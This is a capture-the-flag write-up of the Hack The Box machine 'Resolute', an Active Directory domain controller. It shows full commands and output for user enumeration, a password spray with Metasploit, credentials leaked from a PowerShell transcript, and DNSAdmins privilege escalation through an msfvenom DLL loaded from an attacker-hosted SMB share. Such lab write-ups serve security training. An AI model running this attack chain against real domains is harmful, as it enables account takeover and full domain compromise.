Hackthebox – Resolute
As with any box, I start resolute with several nmap scans too!
root@kalivm:~/Resolute# nmap -sTV -p 1-65535 -oN fullscan_tcp 10.10.10.169
Starting Nmap 7.80 (https://nmap.org ) at 2020-03-07 08:56 CET
Nmap scan report for 10.10.10.169
Host is up (0.018s latency).
Not shown: 65511 closed ports
PORT STATE SERVICE VERSION
53/tcp open domain?
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-03-07 08:05:36Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: MEGABANK)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49677/tcp open msrpc Microsoft Windows RPC
49688/tcp open msrpc Microsoft Windows RPC
49907/tcp open msrpc Microsoft Windows RPC
49924/tcp open unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=3/7%Time=5E6353B3%P=x86_64-pc-linux-gnu%r(DNSVe
SF:rsionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\x
SF:04bind\0\0\x10\0\x03");
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 73.52 secondsSo various ports open which indicates this is a domain controler for the megabank.local domain. Also, ports 445 for SMB and 5985 for WinRM appear to be open. Furthermore it was quite interesting to see that the nmap -A scan gave some errors on the DNS port. That did not happen on other windows boxes yet. After some playing around with ldapsearch, as with Hackthebox – Sauna, I found the output to be slightly overwhelming and decided to go back to the enum4linux tool to see if that would generate some interesting output too.
root@kalivm:~/Resolute# enum4linux -a 10.10.10.169
---snip---
=============================
| Users on 10.10.10.169 |
=============================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
index: 0x10b0 RID: 0x19ca acb: 0x00000010 Account: abigail Name: (null) Desc: (null)
index: 0xfbc RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain
index: 0x10b4 RID: 0x19ce acb: 0x00000010 Account: angela Name: (null) Desc: (null)
index: 0x10bc RID: 0x19d6 acb: 0x00000010 Account: annette Name: (null) Desc: (null)
index: 0x10bd RID: 0x19d7 acb: 0x00000010 Account: annika Name: (null) Desc: (null)
index: 0x10b9 RID: 0x19d3 acb: 0x00000010 Account: claire Name: (null) Desc: (null)
index: 0x10bf RID: 0x19d9 acb: 0x00000010 Account: claude Name: (null) Desc: (null)
index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: (null) Desc: A user account managed by the system.
index: 0x10b5 RID: 0x19cf acb: 0x00000010 Account: felicia Name: (null) Desc: (null)
index: 0x10b3 RID: 0x19cd acb: 0x00000010 Account: fred Name: (null) Desc: (null)
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0x10b6 RID: 0x19d0 acb: 0x00000010 Account: gustavo Name: (null) Desc: (null)
index: 0xff4 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
index: 0x10b1 RID: 0x19cb acb: 0x00000010 Account: marcus Name: (null) Desc: (null)
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak Desc: Account created. Password set to Welcome123!
index: 0x10c0 RID: 0x2775 acb: 0x00000010 Account: melanie Name: (null) Desc: (null)
index: 0x10c3 RID: 0x2778 acb: 0x00000010 Account: naoki Name: (null) Desc: (null)
index: 0x10ba RID: 0x19d4 acb: 0x00000010 Account: paulo Name: (null) Desc: (null)
index: 0x10be RID: 0x19d8 acb: 0x00000010 Account: per Name: (null) Desc: (null)
index: 0x10a3 RID: 0x451 acb: 0x00000210 Account: ryan Name: Ryan Bertrand Desc: (null)
index: 0x10b2 RID: 0x19cc acb: 0x00000010 Account: sally Name: (null) Desc: (null)
index: 0x10c2 RID: 0x2777 acb: 0x00000010 Account: simon Name: (null) Desc: (null)
index: 0x10bb RID: 0x19d5 acb: 0x00000010 Account: steve Name: (null) Desc: (null)
index: 0x10b8 RID: 0x19d2 acb: 0x00000010 Account: stevie Name: (null) Desc: (null)
index: 0x10af RID: 0x19c9 acb: 0x00000010 Account: sunita Name: (null) Desc: (null)
index: 0x10b7 RID: 0x19d1 acb: 0x00000010 Account: ulf Name: (null) Desc: (null)
index: 0x10c1 RID: 0x2776 acb: 0x00000010 Account: zach Name: (null) Desc: (null)
---snip---So the newly created accoutns get password Welcome123!. Could it be possible that one of these users has not yet logged in, or did not change the password after all?
root@kalivm:~/Resolute# msfconsole
---snip---
msf5 > use auxiliary/scanner/smb/smb_login
msf5 auxiliary(scanner/smb/smb_login) > set rhosts 10.10.10.169
rhosts => 10.10.10.169
msf5 auxiliary(scanner/smb/smb_login) > set user_file users.txt
user_file => users.txt
msf5 auxiliary(scanner/smb/smb_login) > set smbpass Welcome123!
smbpass => Welcome123!
msf5 auxiliary(scanner/smb/smb_login) > run
[*] 10.10.10.169:445 - 10.10.10.169:445 - Starting SMB login bruteforce
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\abigail:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\angela:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\annette:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\annika:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\claire:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\claude:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\felicia:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\fred:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\gustavo:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\marcus:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\marko:Welcome123!',
[+] 10.10.10.169:445 - 10.10.10.169:445 - Success: '.\melanie:Welcome123!'
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\naoki:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\paulo:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\per:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\ryan:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\sally:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\simon:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\steve:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\stevie:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\sunita:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\ulf:Welcome123!',
[-] 10.10.10.169:445 - 10.10.10.169:445 - Failed: '.\zach:Welcome123!',
[*] 10.10.10.169:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completedMarko clearly has changed his password, but apparently melanie has not! With this password I could possibly log in using winRM. Would this be enough for user?
root@kalivm:~/Resolute# ruby melanie.rb
PS > whoami
megabank\melanie
PS > pwd
Path
----
C:\Users\melanie\Documents
PS > dir ../Desktop
Directory: C:\Users\melanie\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/3/2019 7:33 AM 32 user.txtApparently it is! With the winRM shell from Hackthebox – Forest I can now login as user Melanie and obtain the flag!
PS > type ../Desktop/user.txt
0c3be45<NOFLAG>96ccbee8d3a978540Privilege Escalation
For privilege escalation, it all started with some of the common privilege escalation tricks. After fiddling with that for a while, I found nothing useful and resorted to the forums where two hints were mentioned. First hint was to look closely at the files in the root. The other hint was that it had something to do with group memberships and privileges.
First step was to look at the root of the system. At first glance, I had not discovered anything interesting, but by default the dir command does not show any hidden files.
PS > dir -force
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hs- 12/3/2019 6:40 AM $RECYCLE.BIN
d--hsl 9/25/2019 10:17 AM Documents and Settings
d----- 9/25/2019 6:19 AM PerfLogs
d-r--- 9/25/2019 12:39 PM Program Files
d----- 11/20/2016 6:36 PM Program Files (x86)
d----- 9/25/2019 10:48 AM ProgramData
d--h-- 12/3/2019 6:32 AM PSTranscripts
d--hs- 9/25/2019 10:17 AM Recovery
d--hs- 9/25/2019 6:25 AM System Volume Information
d-r--- 12/4/2019 2:46 AM Users
d----- 12/4/2019 5:15 AM Windows
-arhs- 11/20/2016 5:59 PM 389408 bootmgr
-a-hs- 7/16/2016 6:10 AM 1 BOOTNXT
-a-hs- 3/6/2020 11:59 PM 402653184 pagefile.sysUsing the dir -force command, I was able to show hidden directories too and that PS Transcripts directory looks quite interesting. I had not seen that while looking with a normal ‘dir’ command.
PS > cd PSTranscripts
PS > dir
PS > Again no files here? Try again with -force
PS > dir -force
Directory: C:\PSTranscripts
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--h-- 12/3/2019 6:45 AM 20191203
PS > cd 20191203
PS > dir -force
Directory: C:\PSTranscripts\20191203
Mode LastWriteTime Length Name
---- ------------- ------ ----
-arh-- 12/3/2019 6:45 AM 3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txtNow there is something interesting, a powershell transcript file
PS > type PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
**********************
Windows PowerShell transcript start
Start time: 20191203063201
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
---snip---
**********************
Command start time: 20191203063515
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
---snip---Now that looks like a username/password combination.
PS > whoami
megabank\ryanAfter modifying the ruby winRM Script to contain that username/password combination, I was indeed logged in as user Ryan! A next step, hopefully towards NT/System or similar! Now with the strange error in the DNS part of the port scan in mind, and the fact that privilege escalation should have something to do with services, it is time to see if I can check the DNS server configuration.
PS > whoami
megabank\melanie
PS > dnscmd resolute /info
Info query failed
status = 5 (0x00000005)
Command failed: ERROR_ACCESS_DENIED 5 0x5As melanie, I get an Access Denied error.
PS > whoami
megabank\ryan
PS > dnscmd resolute /info
Query result:
Server info
server name = Resolute.megabank.local
version = 3839000A (10.0 build 14393)
DS container = cn=MicrosoftDNS,cn=System,DC=megabank,DC=local
forest name = megabank.local
domain name = megabank.local
---snip---As Ryan however, I get the DNS Server information back from the current host (resolute). After some short googling, I ended up at the well-known ired.team site which gave a very nice write-up of getting NT/SYSTEM privileges with the DNSAdmins privileges which Ryan apparently had. So the next steps are to create a malicious dll, load that into the service, restart it and become root. Should be simple then!
root@kalivm:~/Resolute# msfvenom -p windows/x64/exec cmd='net group "domain admins" ryan /add /domain' -f dll > ryan.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 311 bytes
Final size of dll file: 5120 bytesNow that the dll is ready, all that is left is start the smbserver, load it into memory and restart the DNS server. So in another terminal, I start the impacket smb server.
root@kalivm:~/Resolute# smbserver.py -ip 10.10.15.66 reso ./
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsedBack at the winRM terminal, I reconfigure the DNS server to load the dll file and restart it.
PS > dnscmd resolute /config /serverlevelplugindll \\10.10.15.66\reso\ryan.dll
Registry property serverlevelplugindll successfully reset.
Command completed successfully.
PS > sc.exe \\resolute stop dns
SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 3 STOP_PENDING
(STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x1
WAIT_HINT : 0x7530
PS > sc.exe \\resolute start dns
SERVICE_NAME: dns
TYPE : 10 WIN32_OWN_PROCESS
STATE : 2 START_PENDING
(NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x7d0
PID : 728
FLAGS : Meanwhile in the smbserver terminal, I notice the file getting picked up.
[*] Incoming connection (10.10.10.169,55313)
[*] AUTHENTICATE_MESSAGE (MEGABANK\RESOLUTE$,RESOLUTE)
[*] User RESOLUTE\RESOLUTE$ authenticated successfully
[*] RESOLUTE$::MEGABANK:4141414141414141:da9c011f6585aa15d96fa3d560a4686d:010100000000000080162fcb66f4d5013dccd4c800749c8200000000010010004700540066005100640045004d006700020010007400660076006c006b004c0054007500030010004700540066005100640045004d006700040010007400660076006c006b004c00540075000700080080162fcb66f4d5010600040002000000080030003000000000000000000000000040000025b8adeb17d8ccfcf835d16b77e9c708dacb6cb9215921456a9ef365b1dd600c0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310035002e00360036000000000000000000
[*] Disconnecting Share(1:IPC$)
[*] Disconnecting Share(2:RESO)
[*] Handle: [Errno 104] Connection reset by peer
[*] Closing down connection (10.10.10.169,55313)
[*] Remaining connections []Now all I have to see, is if Ryan indeed got added to the Domain Administrators group.
PS > net user /domain ryan
User name ryan
Full Name Ryan Bertrand
---snip---
Local Group Memberships
Global Group memberships *Domain Admins *Domain Users
*Contractors
The command completed successfully.And he has been added. So now I should be able to start a new winRM shell and access the Administrator’s home directory.
root@kalivm:~/Resolute# ruby ryan.rb
PS > cd c:\users\administrator\desktop
PS > dir
Directory: C:\users\administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 12/3/2019 7:32 AM 32 root.txtSo I can read the directory and there is the root flag, and with Ryan’s newfound privileges, I can now access it and complete this box!
PS > type root.txt
e1d9487<NOFLAG>d0c20edb5405e619c
